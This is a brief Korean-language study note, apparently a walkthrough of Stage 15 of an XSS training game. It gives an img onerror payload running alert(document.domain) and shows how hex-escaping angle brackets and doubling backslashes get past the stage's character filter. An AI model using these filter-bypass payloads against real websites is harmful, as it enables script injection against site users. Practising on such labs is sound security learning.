Study
Stage #15 본문
•Stage 15
What you have to do:
Inject the following JavaScript command: alert(document.domain);
다음과 같이 특수문자가 필터링 된다
답) img태그 이용하고
<img src=1 onerror=alert(document.domain)>
<,> 를 \x3c, \x3e 이렇게 바꿔주면 된다
\x3cimg src=1 onerror=alert(document.domain)\x3e
하지만 위와 같이 입력하면 \이 제거되므로
최종 공격 코드는 다음과 같다
\\x3cimg src=1 onerror=alert(document.domain)\\x3e